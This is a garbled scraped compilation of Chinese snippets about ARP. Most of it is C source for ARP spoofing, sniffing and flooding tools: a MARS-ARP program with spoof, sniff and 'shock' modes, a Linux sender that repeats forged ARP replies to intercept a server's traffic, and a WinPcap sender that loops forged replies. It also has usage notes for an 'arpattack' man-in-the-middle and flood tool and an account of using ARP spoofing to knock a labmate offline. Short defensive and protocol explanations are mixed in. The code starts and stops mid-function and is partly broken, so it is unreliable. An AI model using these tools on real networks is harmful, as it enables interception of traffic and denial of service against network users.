-1;}}firstip=ntohl(inet_addr(argv[2]));secondip=ntohl(inet_addr(argv[3]));total=secondip-firstip+1;printf("\nLibarary Version: %s",PacketGetVersion());adapterlength=sizeof(adaptername);if(PacketGetAdapterNames((char*)adaptername,&adapterlength)==FALSE){printf("PacketGetAdapterNames Error: %d\n",GetLastError());return -1;}name1=adaptername;name2=adaptername;i=0;while((*name1!='\0') || (*(name1-1)!='\0')){if(*name1=='\0'){memcpy(adapterlist[i],name2,2*(name1-name2));name2=name1+1;i++;}name1++;}adapternum=i;printf("\nAdapters Installed:\n");for(i=0;i<adapternum;i++)wprintf(L"%d - %s\n",i+1,adapterlist[i]);do{printf("\nSelect the number of the adapter to open: ");scanf("%d",&open);if(open>=1 && open<=adapternum)break;}while(open<1 || open>adapternum);lpadapter=PacketOpenAdapter(adapterlist[open-1]);if(!lpadapter || (lpadapter->hFile==INV ALID_HANDLE_V ALUE)){printf("PacketOpenAdapter Error: %d\n",GetLastError());return -1;}if(PacketGetNetType(lpadapter,&ntype)){printf("\n\t\t*** Host Information ***\n");printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed);}npflen=sizeof(ipbuff);if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen)) {sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));myip=ntohl(sin.sin_addr.s_addr);printf("[MACAddress:]");}else{printf("\nNot get enough data\n");PacketFreePacket(lppackets);PacketCloseAdapter(lpadapter);return -1;}if((lppackets=PacketAllocatePacket())==FALSE){printf("PacketAllocatePacket send Error: %d\n",GetLastError());return -1;}rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid);Sleep(300);if(getmine()){PacketFreePacket(lppackets);PacketFreePacket(lppacketr);PacketCloseAdapter(lpadapter);return -1;}Sleep(300);if((opti==1) || (opti==2)){for(i=0;i<total;i++){sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsi d);Sleep(30);}Sleep(1000);else if((opti==3) || (opti==4)){sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsi d);Sleep(300);CloseHandle(sthread);sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid);}WaitForSingleObject(sthread,INFINITE);CloseHandle(sthread);CloseHandle(rthread);if(PacketGetStats(lpadapter,&stat)==FALSE){printf("Warning: Unable to get the adapter stat\n");}elseprintf("\n\n%d packets received, %d packets lost !\n",stat.bs_recv,stat.bs_drop);}PacketFreePacket(lppackets);PacketFreePacket(lppacketr);PacketCloseAdapter(lpadapter);return 0;}MAS-ARP源代码C/C++#include <stdio.h>#include <conio.h>struct sockaddr_storage{unsigned char sa_len;unsigned char sa_family;unsigned char padding[128];};#include "packet32.h"#pragma comment(lib, "ws2_32.lib")#pragma comment(lib, "packet.lib")#define ETH_IP 0x0800#define ETH_ARP 0x0806#define ARP_REQUEST 0x0001#define ARP_REPLY 0x0002#define ARP_HARDW ARE 0x0001#define NDIS_PACKET_TYPE_PROMISCUOUS 0x00000020#define OP_MIN 1#define OP_MAX 4#define OP_MAC_GET 1#define OP_ANTI_SNIFF 2#define OP_RESET 3#define OP_SPOOF_SNIFF_SHOCK 4#define MAX_NUM_ADAPTER 20#pragma pack(push, 1) typedef struct ethdr{UCHAR eh_dst[6];UCHAR eh_src[6];USHORT eh_type; } ETHDR, *PETHDR; typedef struct arphdr{USHORT arp_hdr;USHORT arp_pro;UCHAR arp_hln;UCHAR arp_pln;USHORT arp_opt;UCHAR arp_sha[6];ULONG arp_spa;UCHAR arp_tha[6];ULONG arp_tpa;} ARPHDR, *PARPHDR; typedef struct iphdr{UCHAR h_lenver;UCHAR tos;USHORT total_len;USHORT ident;USHORT frag_and_flags;UCHAR ttl;UCHAR proto;USHORT checksum;UINT sourceip;UINT destip;} IPHDR, *PIPHDR;#pragma pack(pop)LPADAPTER lpAdapter = NULL; LPPACKET lpPacketRecv = NULL; LPPACKET lpPacketSend = NULL; ULONG ulSelfIP = 0; ULONG ulFirstIP = 0; ULONG ulSecondIP = 0; UCHAR arrucSelfMAC [6] = {0}; UCHAR arrucFirstMAC [6] = {0}; UCHAR arrucSecondMAC[6] = {0}; BOOL bIsSelfMAC = FALSE;BOOL bIsFirstMAC = FALSE;BOOL bIsSecondMAC = FALSE;FILE *fp = NULL;CHAR szMsg[50] = {0};INT iNum = 0;CHAR arrszAdapters [MAX_NUM_ADAPTER][1024] = {0};void ShowInfo(){printf("MARS-ARP --- ARP Tools, Modified by MARS, 2010-04-17\n");printf("Homepage: \n");printf("E-mail: zw198932@\n\n");printf("MARS: Student of <Nanjing University of Posts and Telecommunications>\n");printf("College: <Tongda College>\nSpecialty: <Compunication>\nTerm Class: <07>\n");}void Usage(){printf("\nUsage: MARS-ARP [-m|-a|-r|-s] firstip secondip \n\n");printf("Options:\n");printf(" -m mac Get the mac address from firstip to secondip\n");printf(" -a antisniff Get the sniffing host from firstip to secondip\n");printf(" -r reset Reset the spoofed host work normally\n");printf(" -s spoof 1> Spoof the host between firstip and secondip\n");printf(" sniff 2> Sniff if firstip == secondip == your own ip\n");printf(" shock 3> Shock if firstip == secondip != your own ip\n\n");printf("Attention:\n");printf(" Y ou must have installed the winpcap driver.\n\n");}void IPEnableRouter(){HKEY hKey;if (ERROR_SUCCESS !=RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", &hKey)) {printf("\nError opening: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\T cpip\\Parameters\\IPEnableRouter.\n");}DWORD dwValue = 1;RegSetValueEx(hKey, "IPEnableRouter", NULL, REG_DWORD, (CONST BYTE *)dwValue, 4);RegCloseKey(hKey);}INT GetSelfMAC(){CHAR szSendBuff[1024] = {0};INT k = 0;ETHDR tEthHdr;ARPHDR tArpHdr;for (k=0; k<6; k++){tEthHdr.eh_dst [k] = 0xff;tEthHdr.eh_src [k] = 0x82;tArpHdr.arp_sha[k] = 0x82;tArpHdr.arp_tha[k] = 0x00;}tEthHdr.eh_type = htons(ETH_ARP);tArpHdr.arp_hdr = htons(ARP_HARDW ARE);tArpHdr.arp_pro = htons(ETH_IP);tArpHdr.arp_hln = 6;tArpHdr.arp_pln = 4;tArpHdr.arp_opt = htons(ARP_REQUEST);tArpHdr.arp_tpa = htonl(ulSelfIP);tArpHdr.arp_spa = inet_addr("112.112.112.112");memset(szSendBuff, 0, sizeof(szSendBuff));memcpy(szSendBuff, &tEthHdr, sizeof(tEthHdr));memcpy(szSendBuff + sizeof(tEthHdr), &tArpHdr, sizeof(tArpHdr));PacketInitPacket(lpPacketSend, szSendBuff, sizeof(tEthHdr) + sizeof(tArpHdr));if (PacketSendPacket(lpAdapter, lpPacketSend, TRUE) == FALSE) {printf("PacketSendPacket in GetSelfMAC Error: %d\n", GetLastError());exit(-1);}return true;}void ParsePacket(LPPACKET lpPacket, int iOption){ULONG ulBytesRecv = lpPacket->ulBytesReceived;ULONG ulOffset = 0;ULONG ulTotalLen = 0;ULONG ulLen = 0;ULONG ulLines = 0;ULONG j = 0;ULONG k = 0;PETHDR pEthHdr = NULL;PARPHDR pArpHdr = NULL;PIPHDR pIPHdr = NULL;CHAR *szBuff = (CHAR *)lpPacket->Buffer;CHAR *pcChar = NULL;CHAR *pcLine = NULL;CHAR *pcBase = NULL;struct bpf_hdr *pBPFHdr = NULL;struct sockaddr_in tSockAddr;while (ulOffset < ulBytesRecv){if (kbhit()){return;}pBPFHdr = (struct bpf_hdr *)(szBuff + ulOffset);ulOffset += pBPFHdr->bh_hdrlen;pcChar = (char *)(szBuff + ulOffset);pcBase = pcChar;ulOffset = Packet_WORDALIGN(ulOffset + pBPFHdr->bh_caplen);pEthHdr = (PETHDR)pcChar;pArpHdr = (PARPHDR)(pcChar + sizeof(ETHDR));if (pEthHdr->eh_type == htons(ETH_IP)){pIPHdr = (PIPHDR)(pcChar + sizeof(ETHDR));if (bIsFirstMAC && bIsSecondMAC && (iOption == OP_SPOOF_SNIFF_SHOCK)){if ((((pIPHdr->sourceip != htonl(ulSelfIP)) && (pIPHdr->destip != htonl(ulSelfIP))&& !strcmp((char *)pEthHdr->eh_dst, (char *)arrucSelfMAC))&& ((pIPHdr->sourceip == htonl(ulFirstIP)) || (pIPHdr->destip == htonl(ulFirstIP))|| (pIPHdr->sourceip == htonl(ulSecondIP)) || (pIPHdr->destip == htonl(ulSecondIP))))|| ((ulFirstIP == ulSelfIP) && (ulSecondIP == ulSelfIP))){memset(szMsg, 0, sizeof(szMsg));tSockAddr.sin_addr.s_addr = pIPHdr->sourceip;printf("\n[IP:]%16s ---> [IP:]", inet_ntoa(tSockAddr.sin_addr));fprintf(fp, "\n[IP:]%16s ---> [IP:]", inet_ntoa(tSockAddr.sin_addr));strcpy(szMsg, inet_ntoa(tSockAddr.sin_addr));strcat(szMsg + 15, " ---> ");tSockAddr.sin_addr.s_addr = pIPHdr->destip;printf("%16s\n", inet_ntoa(tSockAddr.sin_addr));fprintf(fp, "%16s\n", inet_ntoa(tSockAddr.sin_addr));strcat(szMsg + 23, inet_ntoa(tSockAddr.sin_addr));// fseek(fp, -2, SEEK_CUR);// fprintf(fp, "\r\n");// fwrite(szMsg, 38, 1, fp);// fprintf(fp, "\r\n");ulLines = (pBPFHdr->bh_caplen + 15) / 16;// 原代码没有下面这句// --------------------------------ulTotalLen = pBPFHdr->bh_caplen;// --------------------------------for (k=0; k<ulLines; k++){pcLine = pcChar;printf("%08lx : ", pcChar - pcBase);fprintf(fp, "%08lx : ", pcChar - pcBase);ulLen = ulTotalLen;ulLen = (ulLen > 16) ? 16 : ulLen;for (j=0; j<ulLen; j++){printf("%02x ", *(BYTE *)pcChar++);fprintf(fp, "%02x ", *(BYTE *)pcChar++);}if (ulLen < 16){// 原句printf("%*s", (16 - ulLen) * 3, " ");// 改为// --------------------------------ulLen = 16 - ulLen;while (ulLen--){printf(" ");fprintf(fp, " ");}// --------------------------------}pcChar = pcLine;// 条件微调//---------------------------------------------------------------for (j=0; j<(ulTotalLen>16?16:ulTotalLen); j++, pcChar++){// 强制转换，VS08条件苛刻printf("%c", isprint(*(BYTE *)pcChar) ? *(BYTE *)pcChar : '.');fputc(isprint(*(BYTE *)pcChar) ? *(BYTE *)pcChar : '.', fp);}//----------------------------------------------------------------ulTotalLen -= ulLen;fprintf(fp, "\r\n");printf("\n");}fprintf(fp, "\r\n");}}continue;}else if ((pEthHdr->eh_type == htons(ETH_ARP)) && (pArpHdr->arp_opt == htons(ARP_REPLY))){tSockAddr.sin_addr.s_addr = pArpHdr->arp_spa;if (tSockAddr.sin_addr.s_addr == htonl(ulSelfIP)){memcpy(arrucSelfMAC, pEthHdr->eh_src, 6);if (!bIsSelfMAC)。

arp攻击(arp攻击解决办法)如果你发现经常网络掉线，或者发现自己的网站所有页面都被挂马，但到服务器上，查看页面源代码，却找不到挂马代码，就要考虑到是否自己机器或者同一IP段中其他机器是否中了ARP病毒。

除了装ARP防火墙以外，还可以通过绑定网关的IP和MAC来预防一下。

如果你发现经常网络掉线，或者发现自己的网站所有页面都被挂马，但到服务器上，查看页面源代码，却找不到挂马代码，就要考虑到是否自己机器或者同一IP段中其他机器是否中了ARP病毒。

除了装ARP防火墙以外，还可以通过绑定网关的IP和MAC来预防一下。

这个方法在局域网中比较适用：你所在的局域网里面有一台机器中了ARP病毒，它伪装成网关，你上网就会通过那台中毒的机器，然后它过一会儿掉一次线来骗取别的机器的帐户密码什么的东西。

下面是手动处理方法的简要说明：如何检查和处理“ ARP 欺骗”木马的方法1．检查本机的“ ARP 欺骗”木马染毒进程同时按住键盘上的“ CTRL ”和“ ALT ”键再按“ DEL ”键，选择“任务管理器”，点选“进程”标签。

察看其中是否有一个名为“ MIR0.dat ”的进程。

如果有，则说明已经中毒。

右键点击此进程后选择“结束进程”。

2．检查网内感染“ ARP 欺骗”木马染毒的计算机在“开始” - “程序” - “附件”菜单下调出“命令提示符”。

输入并执行以下命令：ipconfig记录网关IP 地址，即“Default Gateway ”对应的值，例如“ 59.66.36.1 ”。

再输入并执行以下命令：arp –a在“ Internet Address ”下找到上步记录的网关IP 地址，记录其对应的物理地址，即“ Physical Address ”值，例如“ 00-01-e8-1f-35-54 ”。

在网络正常时这就是网关的正确物理地址，在网络受“ ARP 欺骗”木马影响而不正常时，它就是木马所在计算机的网卡物理地址。

转贴-------ARP攻击C语⾔代码ARP攻击C语⾔代码本代码基本不具备危害性，只是通过MAC地址欺骗修改服务器缓冲区信息实现消息拦截。

假设被攻击服务器 IP 地址为 192.168.20.8 ,MAC地址为 00:0C:29:BD:1C:EF被拦截消息计算机IP地址为 192.168.20.9本机MAC 地址为 00:0C:29:AF:FB:D3#include<stdio.h>#include<string.h>#include<unistd.h>#include<stdlib.h>#include<net/if_arp.h>#include<net/ethernet.h>#include<sys/types.h>#include<sys/socket.h>#define ARP_LEN 30 //ARP帧头字节数void mac_str( char *mac, char *buf ){sscanf(mac, "%x:%x:%x:%x:%x:%x", buf, buf+1, buf+2, buf+3, buf+4, buf+5);}void ip_str( char *ip, char *buf ){sscanf(ip, "%d.%d.%d.%d", buf, buf+1, buf+2, buf+3);}void encapsulate_frame( char *dest_mac, char *source_mac, unsigned int type, char *buf ){mac_str(dest_mac, buf);mac_str(source_mac, buf+6);*(short *)(buf+12) = htons(type);}void encapsulate_arp( unsigned short ar_op, char *source_mac, char *source_ip, char *dest_mac, char *dest_ip, char *buf ) {struct arphdr parp;parp.ar_hrd = htons(ARPHRD_ETHER);parp.ar_pro = htons(ETHERTYPE_IP);parp.ar_hln = 6;parp.ar_pln = 4;parp.ar_op = htons(ar_op);memcpy(buf, &parp, sizeof(struct arphdr));char addr_buf[20];mac_str(source_mac, addr_buf);ip_str(source_ip, addr_buf + 6);mac_str(dest_mac, addr_buf + 10);ip_str(dest_ip, addr_buf + 16);memcpy(buf + sizeof(struct arphdr), addr_buf, 20);}int open_packet_socket( void ){int sock_fd;if( (sock_fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_PARP)) ) < 0 ){perror("Create socket error.\n");exit(-1);}return sock_fd;}int main( int argc, char **argv ){char *source_ip = "192.168.20.9"; // 真实 IP 地址char *source_mac = "00:0C:29:AF:FB:D3"; // 欺骗 MAC 地址char *dest_ip = "192.168.20.8";char *dest_mac = "00:0C:29:BD:1C:EF";char *buf = (char *)malloc(sizeof(struct ether_header) + ARP_LEN);encapsulate_frame(dest_mac, source_mac, ETHERTYPE_ARP, buf);encapsulate_arp(ARPOP_REPLY, source_mac, source_ip, dest_mac, dest_ip, buf+sizeof(struct ether_header)); int sock_fd = open_packet_socket();int i;struct sockaddr to;bzero( &to, sizeof(struct sockaddr) );to.sa_family = AF_INET;strcpy(to.sa_data, "eth0"); //通过eth0⽹卡发送;for(i=0; i<100000; i++){/* 44为以太⽹帧头长度加ARP帧头长度 ,sizeof(ether_header) + ARP_LEN */sendto(sock_fd, buf, 44, 0, &to, sizeof(struct sockaddr));usleep(100000);}printf("Send over.\n");return0;}。

ARP探测C语言实现ARP（Address Resolution Protocol，地址解析协议）是用于将IP 地址转换为物理地址（MAC地址）的协议。

在网络中，ARP请求和应答消息的交互可以帮助主机发现目标主机的物理地址。

下面是一个基于C语言的简单ARP探测实现。

ARP请求阶段：1.创建原始套接字，用于发送和接收网络数据包。

```cint sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);if (sockfd < 0)perror("Failed to create socket.");return -1;```2.设置套接字选项，允许发送与接收IP首部。

```cif (setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable)) < 0)perror("Failed to set socket options.");return -1;}```3.设置目标主机的IP地址。

```cstruct in_addr dest_ip;if (inet_aton(target_ip, &dest_ip) == 0)printf("Invalid IP address specified.");return -1;```4.构造ARP请求包。

```cstruct arphdr arp_header;memset(&arp_header, 0, sizeof(arp_header));arp_header.ar_hrd = htons(ARPHRD_ETHER); // 以太网地址类型arp_header.ar_pro = htons(ETH_P_IP); // IP地址类型arp_header.ar_hln = ETH_ALEN; // MAC地址长度arp_header.ar_pln = sizeof(in_addr_t); // IP地址长度arp_header.ar_op = htons(ARPOP_REQUEST); // ARP请求操作码struct ether_arp ether_arp_pkt;memset(&ether_arp_pkt, 0, sizeof(ether_arp_pkt));//设置以太网帧的源地址和目标地址memcpy(ether_arp_pkt.arp_sha, mac_addr, ETH_ALEN); memset(ether_arp_pkt.arp_tha, 0xff, ETH_ALEN);//设置以太网帧的协议类型ether_arp_pkt.ea_hdr.ar_hrd = arp_header.ar_hrd;ether_arp_pkt.ea_hdr.ar_pro = arp_header.ar_pro;ether_arp_pkt.ea_hdr.ar_hln = arp_header.ar_hln;ether_arp_pkt.ea_hdr.ar_pln = arp_header.ar_pln;ether_arp_pkt.ea_hdr.ar_op = arp_header.ar_op;//设置ARP请求的源IP地址和目标IP地址ether_arp_pkt.arp_spa = inet_addr(sender_ip);ether_arp_pkt.arp_tpa = dest_ip.s_addr;//构造完成的ARP请求数据包memcpy(buffer, &ether_arp_pkt, sizeof(ether_arp_pkt)); ```5.设置套接字的目标地址。

ARP包解析与ARP欺骗攻击得分：u_char ar_hln; //硬件地址长度u_char ar_pln; //协议地址长度u_short ar_op; //操作u_char arp_smac[6]; //发送端以太网地址u_char arp_sip[4]; //发送端IPu_char arp_dmac[6]; //目的端以太网地址u_char arp_dip[4]; //目的IP}ether_arp;pcap_t *adhandle;void open_dev();void arp_init(ether_header* e_head,ether_arp* e_arp);void mk_arp_packt(u_char packet[],ether_header* e_head,ether_arp* e_arp);u_short byte_swap(u_short i);void main(){ether_arp* e_arp=(ether_arp*)malloc(sizeof(ether_arp));ether_header* e_head=(ether_header*)malloc(sizeof(ether_header));u_char packet[100];open_dev();//先打开网卡arp_init(e_head,e_arp);//输入目的主机的相关信息mk_arp_packt(packet,e_head,e_arp);//伪造Arp数据包while(true){if (pcap_sendpacket(adhandle, packet,42)!= 0)//发送数据{fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle));return;}elseprintf("Send Data Successfully\n");}}void open_dev(){pcap_if_t *alldevs;pcap_if_t *d;int index;int i=0;char errbuf[PCAP_ERRBUF_SIZE];if(pcap_findalldevs_ex(PCAP_SRC_IF_STRING,NULL,&alldevs,errbuf)==-1){fprintf(stderr,"Error in pcap_findalldevs_ex:%s\n",errbuf);exit(1);}for(d=alldevs;d!=NULL;d=d->next){printf("%d:\n%s",i++,d->name);if(d->description)printf("%s\n",d->description);elseprintf("No Description available");}if(i==0){printf("\nNo interfaces found!Make sure WinpCap is installed.\n");return;}printf("\n\nIf You Want Choose a Device To Capture The Data Please Input The Number Before The Device\n");scanf("%d",&index);char ch;ch=getchar();if(index>i||index<0){printf("You Choosed An Error Num");exit(1);}for(d=alldevs,i=0;i<index;d=d->next,i++);printf("You Choosed The Device It's Name Is:%s",d->name);//打开适配器为检测做好准备if((adhandle=pcap_open(d->name,65536,PCAP_OPENFLAG_PROMISCUOUS,1000,NULL,errbuf))==NULL){fprintf(stderr,"\nUnable to Open the adapter.%s is Not support by WinPcap\n",d->name);pcap_freealldevs(alldevs);return;}printf("\nDevice Open Successful");}void arp_init(ether_header* e_head,ether_arp* e_arp){int input;u_char ch;printf("Please Input Your Mac:");for (int i=0;i<6;i++){scanf("%x",&input);e_head->eh_src[i]=input;}ch=getchar();printf("Please Input Your IPAddress:");for (int i=0;i<4;i++){scanf("%d",&input);e_arp->arp_sip[i]=input;}printf("Please Input The Disitination Mac:");ch=getchar();for (int i=0;i<6;i++){scanf("%x",&input);e_head->eh_dst[i]=input;}printf("Please Input Disitination IPAddress:");for (int i=0;i<4;i++){scanf("%d",&input);e_arp->arp_dip[i]=input;}printf("Information Collected Over");}void mk_arp_packt(u_char packet[],ether_header* e_head,ether_arp* e_arp) {e_arp->ar_hln=0x06;e_arp->ar_hrd=byte_swap(1);e_arp->ar_pro=byte_swap(ETHERTYPE_IP);e_arp->ar_pln=0x04;e_arp->ar_op=byte_swap(ARPOP_REPLY);e_head->eh_type=byte_swap(ETHERTYPE_ARP);memcpy(e_arp->arp_smac,e_head->eh_src,6);memcpy(e_arp->arp_dmac,e_head->eh_dst,6);memcpy(packet,e_head,14);memcpy(packet+14,e_arp,28);}u_short byte_swap(u_short swap){u_short swaped;u_short low;u_short hight;。

ARP攻击程序使用详解arpattack –t TYPE OPTIONOPTION包括：-h , --hosts指定被攻击的主机。

可以指定一台主机-h host。

可以指定一个网段的主机-h host/netmask，掩码可以用数字例如24来代替255.255.255.0，也可以直接指定掩码例如255.255.255.0。

可以指定一个范围的主机-h host1~host2，例如-h 10.11.19.2,10.11.35.255。

可以指定多台不连续的主机，-h host1,host2,host3,…，例如-h 10.11.19.161,10.11.19.24,10.11.19.35,10.11.19.86-l , --timeslot指定发送攻击数据包的时间间隔，以秒为单位计算，若命令中未指定，则默认为3秒。

-e , --exclusive指定哪些主机不受攻击，指定的规则与-h相同，可以-e 10.11.19.25/24,-e 10.11.19.25/255.255.255.0,-e 10.11.19.1~10.11.19.28,-e 10.11.19.16,10.11.19.222,10.11.19.161。

例如-h 10.11.19.3/24 –e 10.11.19.222,10.11.19.206意思是指定网络地址10.11.19.0，掩码255.255.255.0网段内除了10.11.19.222，10.11.19.206这两台主机之外的所有主机为受攻击的目标主机。

-i , --interface指定网络接口。

-s , --sniffer指定进行嗅探的主机。

在-t sniffer中间人攻击中会用到这个选项，如果命令中未指定该选项那么默认就是本地主机作为嗅探主机。

-n , --number指定发动ARP泛滥攻击的攻击数据包个数。

如果命令中未指定该选项那么默认的攻击数据包个数是3000个。

-o , --one_end在-t sniffer中间人攻击中，用来指定需要监听一方的主机地址。

ARP代码实现#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <arpa/inet.h>#include <netdb.h>#include <linux/if.h>#include <sys/ioctl.h>#include <linux/if_packet.h>#include <linux/if_ether.h>void GetEthInfor(char *name , char *MAC_addr , struct in_addr * IP_addr); struct ARP_PACKET{//以太网首部unsigned char dest_mac[6]; //以太网的目的地址6字节unsigned char sorce_mac[6];//以太网的源地址6字节unsigned short type; //帧类型2字节//arp内容unsigned short hw_type; //2字节：硬件地址类型0x0001 表示mac地址unsigned short pro_type; //2字节：协议类型 0x0806 表示IPV4地址unsigned char hw_len; //1字节：硬件地址长度unsigned char pro_len; //1字节：协议长度unsigned short op; //2字节：操作类型 0x0001表示ARP请求；0x0002表示ARP应答unsigned char from_mac[6];//发送端以太网地址6字节unsigned char from_ip[4]; //发送端ip地址4字节unsigned char to_mac[6]; //目的以太网地址6字节unsigned char to_ip[4]; //目的以太网ip地址4字节unsigned char padding[18];//18字节：填充字节，因为以太网数据最少要46字节};int main(){int i = 0;int fd = 0;int num=0;unsigned char MAC_ADDR[6];struct in_addr IP_ADDR;struct ARP_PACKET arp_pk={0};struct sockaddr_ll eth_info;//通用地址结构（套接字）//第一步：获取指定网卡的信息（MAC地址和IP地址）GetEthInfor("eth0",MAC_ADDR,&IP_ADDR);/*printf("The MAC_addr is:");for(i =0 ;i<6;i++)printf("%4X",MAC_ADDR[i]);printf("\n");printf("the IP is:%s\n",inet_ntoa(IP_ADDR));*///第二步：填充ARP数据包的内容//填充以太网首部的目的mac地址for(i=0;i<6;i++) {arp_pk.dest_mac[i]=0XFF;}//填充以太网首部的源mac地址for(i=0;i<6;i++) {arp_pk.sorce_mac[i]=MAC_ADDR[i];}arp_pk.type = htons(0x0806); //填充以太网首部的侦类型arp_pk.hw_type = htons(0x0001); //填充硬件地址类型：0x0001表示的是MAC地址arp_pk.pro_type = htons(0x0800);//填充协议地址类型：0x0800表示的是IP地址arp_pk.hw_len = 6; //填充硬件地址长度arp_pk.pro_len = 4; //填充协议地址长度arp_pk.op = htons(0x0001); //填充操作类型：0x0001表示ARP请求//填充源mac地址for(i=0;i<6;i++) {arp_pk.from_mac[i]=MAC_ADDR[i];}//填充源IP地址for(i=0;i<4;i++) {arp_pk.from_ip[i]=(inet_ntoa(IP_ADDR))[i];}//填充欲获取的目的mac地址for(i=0;i<6;i++) {arp_pk.to_mac[i]=0X00;}arp_pk.to_ip[0]=0X0A; //填充想要转换为MAC地址的IP地址。

简述arp的c语言工作原理和流程下载提示：该文档是本店铺精心编制而成的，希望大家下载后，能够帮助大家解决实际问题。

文档下载后可定制修改，请根据实际需要进行调整和使用，谢谢!本店铺为大家提供各种类型的实用资料，如教育随笔、日记赏析、句子摘抄、古诗大全、经典美文、话题作文、工作总结、词语解析、文案摘录、其他资料等等，想了解不同资料格式和写法，敬请关注!Download tips: This document is carefully compiled by this editor. I hope that after you download it, it can help you solve practical problems. The document can be customized and modified after downloading, please adjust and use it according to actual needs, thank you! In addition, this shop provides you with various types of practical materials, such as educational essays, diary appreciation, sentence excerpts, ancient poems, classic articles, topic composition, work summary, word parsing, copy excerpts, other materials and so on, want to know different data formats and writing methods, please pay attention!ARP的C语言工作原理和流程在计算机网络中，地址解析协议（Address Resolution Protocol，ARP）是一种用于将IP 地址解析为MAC地址的协议。

一．关于ARP协议的基础知识1．ARP的工作原理我们都知道以太网设备比如网卡都有自己全球唯一的MAC地址，它们是以MAC地址来传输以太网数据包的，但是它们却识别不了我们IP包中的IP地址，所以我们在以太网中进行IP 通信的时候就需要一个协议来建立IP地址与MAC地址的对应关系，以使IP数据包能发到一个确定的地方去。

这就是ARP(Address Resolution Protocol，地址解析协议)。

讲到此处，我们可以在命令行窗口中，输入arp –a来看一下效果，类似于这样的条目210.118.45.100 00-0b-5f-e6-c5-d7 dynamic就是我们电脑里存储的关于IP地址与MAC地址的对应关系，dynamic表示是临时存储在ARP 缓存中的条目，过一段时间就会超时被删除(xp/2003系统是2分钟)。

这样一来，比如我们的电脑要和一台机器比如210.118.45.1通信的时候，它会首先去检查arp缓存，查找是否有对应的arp条目，如果没有，它就会给这个以太网络发ARP请求包广播询问210.118.45.1的对应MAC地址，当然，网络中每台电脑都会收到这个请求包，但是它们发现210.118.45.1并非自己，就不会做出相应，而210.118.45.1就会给我们的电脑回复一个ARP应答包，告诉我们它的MAC地址是xx-xx-xx-xx-xx-xx,于是我们电脑的ARP缓存就会相应刷新,多了这么一条：210.118.45.1 xx-xx-xx-xx-xx-xx dynamic为什么要有这么一个ARP缓存呢，试想一下如果没有缓存，我们每发一个IP包都要发个广播查询地址，岂不是又浪费带宽又浪费资源？而且我们的网络设备是无法识别ARP包的真伪的，如果我们按照ARP的格式来发送数据包，只要信息有效计算机就会根据包中的内容做相应的反应.试想一下,如果我们按照ARP响应包的相应的内容来刷新自己的ARP缓存中的列表，嘿嘿，那我们岂不是可以根据这点在没有安全防范的网络中玩些ARP包的小把戏了？在后面的文章里我就手把手来教你们如何填充发送ARP包，不过先别急，我们再继续学点基础知识^_^2．ARP包的格式既然我们要来做一个我们自己的ARP包，当然首先要学习一下ARP包的格式。

CC++Npcap包实现ARP欺骗npcap 是Nmap⾃带的⼀个数据包处理⼯具，Nmap底层就是使⽤这个包进⾏收发包的，该库，是可以进⾏⼆次开发的，不过使⽤C语⾔开发费劲，在进⾏渗透任务时，还是使⽤Python构建数据包⾼效，唯⼀的区别是使⽤Python的库，可以节约我们寻找数据包结构的时间. Npcap发送ARP数据包: 通过使⽤Npcap实现发送⼀个ARP⼴播数据包,这⾥需要先构建数据包的结构,然后在发送出去.#include <stdio.h>#include <winsock2.h>#include <Windows.h>#include <pcap.h>#pragma comment(lib, "packet.lib")#pragma comment(lib, "wpcap.lib")#pragma comment(lib,"WS2_32.lib")#define ETH_ARP 0x0806 // 以太⽹帧类型表⽰后⾯数据的类型，对于ARP请求或应答来说，该字段的值为x0806#define ARP_HARDWARE 1 // 硬件类型字段值为表⽰以太⽹地址#define ETH_IP 0x0800 // 协议类型字段表⽰要映射的协议地址类型值为x0800表⽰IP地址#define ARP_REQUEST 1 // ARP请求#define ARP_RESPONSE 2 // ARP应答//14字节以太⽹⾸部struct EthernetHeader{u_char DestMAC[6]; // ⽬的MAC地址6字节u_char SourMAC[6]; // 源MAC地址 6字节u_short EthType; // 上⼀层协议类型，如0x0800代表上⼀层是IP协议，0x0806为arp 2字节};//28字节ARP帧结构struct ArpHeader{unsigned short hdType; // 硬件类型unsigned short proType; // 协议类型unsigned char hdSize; // 硬件地址长度unsigned char proSize; // 协议地址长度unsigned short op; // 操作类型，ARP请求（1），ARP应答（2），RARP请求（3），RARP应答（4）。

[c#]记⼀次实验室局域⽹的ARP欺骗起因某天中午午睡时，笔者被激烈的键盘和⿏标声⾳吵醒，发现实验室的同学在那边忘我地打LOL，顿觉不爽，于是决定整他⼀下。

想了⼀下之后觉得就让他掉线⼀下作为惩罚好了。

结合以往的理论知识，⼤家在同⼀个局域⽹中，⽤ARP欺骗显然是⼀个好办法，于是就有了本⽂接下来的故事。

ARP欺骗理论⾸先先来整理⼀下关于ARP欺骗的理论知识。

ARP欺骗[1]（英语：ARP spoofing），⼜称ARP病毒（ARP poisoning）或ARP攻击，是针对以太⽹地址解析协议（ARP）的⼀种攻击技术。

此种攻击可让攻击者获取局域⽹上的数据包甚⾄可篡改数据包，且可让⽹络上特定电脑或所有电脑⽆法正常连接。

